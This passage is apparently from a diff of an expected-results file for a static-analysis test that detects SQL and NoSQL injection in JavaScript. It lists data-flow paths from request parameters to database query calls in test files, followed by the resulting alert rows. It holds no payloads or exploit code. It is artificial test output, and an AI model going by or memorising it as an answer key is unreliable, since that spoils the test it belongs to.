provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:113:31:113:35 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:20:8:20:17 | query | mongoose.js:136:30:136:34 | query | provenance | | -| mongoose.js:20:16:20:17 | {} | mongoose.js:20:8:20:17 | query | provenance | | -| mongoose.js:21:2:21:6 | query | mongoose.js:24:22:24:26 | query | provenance | | -| mongoose.js:21:16:21:23 | req.body | mongoose.js:21:16:21:29 | req.body.title | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:8:20:17 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:16:20:17 | {} | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:21:2:21:6 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:24:22:24:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:27:17:27:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:30:22:30:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:33:21:33:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:36:28:36:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:39:16:39:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:42:19:42:23 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:28:45:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:48:28:48:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:28:51:32 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:22:54:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:18:57:22 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:60:22:60:26 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:21:63:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:65:32:65:36 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:27:67:31 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:8:68:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:17:71:21 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:72:10:72:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:8:73:12 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:74:7:74:11 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:16:75:20 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:76:12:76:16 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:77:10:77:14 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:81:37:81:41 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:82:46:82:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:83:47:83:51 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:85:46:85:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:87:51:87:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:89:46:89:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:92:46:92:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:94:51:94:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:96:46:96:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:104:21:104:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:111:14:111:18 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:113:31:113:35 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:133:38:133:42 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:136:30:136:34 | query | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:24:21:24:27 | [query] | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:27:17:27:21 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:30:22:30:26 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:33:21:33:25 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:36:28:36:32 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:39:16:39:20 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:42:19:42:23 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:45:28:45:32 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:48:28:48:32 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:51:28:51:32 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:54:22:54:26 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:57:18:57:22 | query | mongoose.js:60:22:60:26 | query | provenance | | -| mongoose.js:60:22:60:26 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:63:21:63:25 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:65:32:65:36 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:67:27:67:31 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:68:8:68:12 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:71:17:71:21 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:72:10:72:14 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:73:8:73:12 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:74:7:74:11 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:75:16:75:20 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:76:12:76:16 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:77:10:77:14 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:81:37:81:41 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:82:46:82:50 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:85:46:85:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:87:51:87:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:89:46:89:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:92:46:92:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:94:51:94:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:96:46:96:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:104:21:104:25 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:111:14:111:18 | query | mongoose.js:113:31:113:35 | query | provenance | | -| mongoose.js:113:31:113:35 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:123:20:123:21 | id | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:130:23:130:24 | id | provenance | | -| mongoose.js:115:11:115:22 | req.query.id | mongoose.js:115:6:115:22 | id | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:116:22:116:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:117:21:117:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:118:21:118:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:119:18:119:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:120:22:120:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:121:16:121:19 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:122:19:122:22 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:124:28:124:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:125:28:125:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:126:28:126:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:127:18:127:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:128:22:128:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:129:21:129:24 | cond | provenance | | -| mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:115:25:115:45 | cond | provenance | | -| mongoose.js:130:23:130:24 | id | mongoose.js:130:16:130:26 | { _id: id } | provenance | Config | -| mongoose.js:133:38:133:42 | query | mongoose.js:136:30:136:34 | query | provenance | | -| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:23:19:23:23 | query | provenance | | -| mongooseJsonParse.js:19:19:19:20 | {} | mongooseJsonParse.js:19:11:19:20 | query | provenance | | -| mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:11:19:20 | query | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:19:19:20 | {} | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:23:19:23:23 | query | provenance | Config | -| mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | provenance | Config | -| mongooseModelClient.js:10:7:10:32 | v | mongooseModelClient.js:11:22:11:22 | v | provenance | | -| mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | -| mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:10:22:10:31 | req.body.x | provenance | Config | -| mongooseModelClient.js:10:22:10:31 | req.body.x | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | provenance | Config | -| mongooseModelClient.js:11:22:11:22 | v | mongooseModelClient.js:11:16:11:24 | { id: v } | provenance | Config | -| mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:22:12:32 | req.body.id | provenance | Config | -| mongooseModelClient.js:12:22:12:32 | req.body.id | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | provenance | Config | -| mysql.js:6:9:6:31 | temp | mysql.js:15:62:15:65 | temp | provenance | | -| mysql.js:6:9:6:31 | temp | mysql.js:19:70:19:73 | temp | provenance | | -| mysql.js:6:16:6:31 | req.params.value | mysql.js:6:9:6:31 | temp | provenance | | -| mysql.js:15:62:15:65 | temp | mysql.js:15:18:15:65 | 'SELECT ... + temp | provenance | | -| mysql.js:19:70:19:73 | temp | mysql.js:19:26:19:73 | 'SELECT ... + temp | provenance | | -| pg-promise-types.ts:7:9:7:28 | taint | pg-promise-types.ts:8:17:8:21 | taint | provenance | | -| pg-promise-types.ts:7:17:7:28 | req.params.x | pg-promise-types.ts:7:9:7:28 | taint | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:9:10:9:14 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:10:11:10:15 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:11:17:11:21 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:12:10:12:14 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:13:12:13:16 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:14:18:14:22 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:15:11:15:15 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:16:10:16:14 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:17:16:17:20 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:18:12:18:16 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:19:13:19:17 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:22:11:22:15 | query | provenance | | -| pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:6:7:7:55 | query | provenance | | -| pg-promise.js:9:10:9:14 | query | pg-promise.js:10:11:10:15 | query | provenance | | -| pg-promise.js:10:11:10:15 | query | pg-promise.js:11:17:11:21 | query | provenance | | -| pg-promise.js:11:17:11:21 | query | pg-promise.js:12:10:12:14 | query | provenance | | -| pg-promise.js:12:10:12:14 | query | pg-promise.js:13:12:13:16 | query | provenance | | -| pg-promise.js:13:12:13:16 | query | pg-promise.js:14:18:14:22 | query | provenance | | -| pg-promise.js:14:18:14:22 | query | pg-promise.js:15:11:15:15 | query | provenance | | -| pg-promise.js:15:11:15:15 | query | pg-promise.js:16:10:16:14 | query | provenance | | -| pg-promise.js:16:10:16:14 | query | pg-promise.js:17:16:17:20 | query | provenance | | -| pg-promise.js:17:16:17:20 | query | pg-promise.js:18:12:18:16 | query | provenance | | -| pg-promise.js:18:12:18:16 | query | pg-promise.js:19:13:19:17 | query | provenance | | -| pg-promise.js:19:13:19:17 | query | pg-promise.js:22:11:22:15 | query | provenance | | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:60:20:60:24 | query | provenance | | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:63:23:63:27 | query | provenance | | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:64:16:64:20 | query | provenance | | -| pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | provenance | | -| pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | provenance | | -| pg-promise.js:41:7:41:20 | req.params.foo | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | provenance | | -| redis.js:10:16:10:23 | req.body | redis.js:10:16:10:27 | req.body.key | provenance | Config | -| redis.js:12:9:12:26 | key | redis.js:13:16:13:18 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:18:16:18:18 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:19:43:19:45 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:25:14:25:16 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:26:14:26:16 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:32:28:32:30 | key | provenance | | -| redis.js:12:15:12:22 | req.body | redis.js:12:15:12:26 | req.body.key | provenance | Config | -| redis.js:12:15:12:26 | req.body.key | redis.js:12:9:12:26 | key | provenance | | -| redis.js:13:16:13:18 | key | redis.js:18:16:18:18 | key | provenance | | -| redis.js:18:16:18:18 | key | redis.js:19:43:19:45 | key | provenance | | -| redis.js:19:43:19:45 | key | redis.js:25:14:25:16 | key | provenance | | -| redis.js:25:14:25:16 | key | redis.js:26:14:26:16 | key | provenance | | -| redis.js:26:14:26:16 | key | redis.js:30:23:30:25 | key | provenance | | -| redis.js:26:14:26:16 | key | redis.js:32:28:32:30 | key | provenance | | -| redis.js:38:11:38:28 | key | redis.js:39:16:39:18 | key | provenance | | -| redis.js:38:11:38:28 | key | redis.js:43:27:43:29 | key | provenance | | -| redis.js:38:11:38:28 | key | redis.js:46:34:46:36 | key | provenance | | -| redis.js:38:17:38:24 | req.body | redis.js:38:17:38:28 | req.body.key | provenance | Config | -| redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | -| socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | -| socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | -| tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | provenance | | -| tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | -| tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | -| tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | -| tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | subpaths -#select -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | -| graphql.js:27:30:27:40 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:27:30:27:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:30:32:30:42 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:30:32:30:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:33:18:33:28 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:33:18:33:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:44:14:44:24 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:44:14:44:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:48:44:48:54 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:48:44:48:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:56:39:56:49 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:56:39:56:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:58:66:58:76 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:58:66:58:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | graphql.js:74:14:74:25 | req.query.id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:84:14:90:8 | `{\\n ... }` | graphql.js:74:14:74:25 | req.query.id | graphql.js:84:14:90:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:120:38:120:48 | `foo ${id}` | graphql.js:119:16:119:28 | req.params.id | graphql.js:120:38:120:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:119:16:119:28 | req.params.id | user-provided value | -| html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | -| json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | -| json-schema-validator.js:35:18:35:22 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | -| json-schema-validator.js:55:22:55:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:55:22:55:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | -| json-schema-validator.js:59:22:59:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:59:22:59:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | -| json-schema-validator.js:61:22:61:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:61:22:61:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | -| koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | koarouter.js:5:13:5:19 | version | koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | This query string depends on a $@. | koarouter.js:5:13:5:19 | version | user-provided value | -| ldap.js:28:30:28:34 | opts1 | ldap.js:20:21:20:27 | req.url | ldap.js:28:30:28:34 | opts1 | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| marsdb-flow-to.js:14:17:14:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:14:17:14:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | -| marsdb.js:16:12:16:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:16:12:16:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | -| minimongo.js:18:12:18:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:18:12:18:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | -| mongodb.js:18:16:18:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:18:16:18:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | -| mongodb.js:32:18:32:45 | { title ... itle) } | mongodb.js:26:19:26:26 | req.body | mongodb.js:32:18:32:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:26:19:26:26 | req.body | user-provided value | -| mongodb.js:54:16:54:20 | query | mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | This query object depends on a $@. | mongodb.js:49:19:49:33 | req.query.title | user-provided value | -| mongodb.js:65:12:65:16 | query | mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | This query object depends on a $@. | mongodb.js:60:16:60:30 | req.query.title | user-provided value | -| mongodb.js:77:14:77:26 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:77:14:77:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:85:12:85:24 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:85:12:85:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:112:14:112:18 | query | mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | This query object depends on a $@. | mongodb.js:107:17:107:29 | queries.title | user-provided value | -| mongodb_bodySafe.js:29:16:29:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | -| mongoose.js:24:21:24:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:24:21:24:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:27:17:27:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:17:27:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:30:22:30:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:30:22:30:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:33:21:33:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:21:33:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:36:28:36:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:36:28:36:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:39:16:39:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:16:39:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:42:19:42:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:42:19:42:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:45:28:45:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:28:45:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:48:28:48:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:48:28:48:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:51:28:51:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:28:51:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:54:22:54:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:22:54:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:57:18:57:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:18:57:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:60:22:60:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:22:60:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:63:21:63:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:21:63:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:65:32:65:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:65:32:65:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:67:27:67:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:67:27:67:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:68:8:68:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:8:68:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:71:17:71:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:17:71:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:72:10:72:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:72:10:72:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:73:8:73:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:8:73:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:74:7:74:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:74:7:74:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:75:16:75:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:16:75:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:77:10:77:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:77:10:77:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| 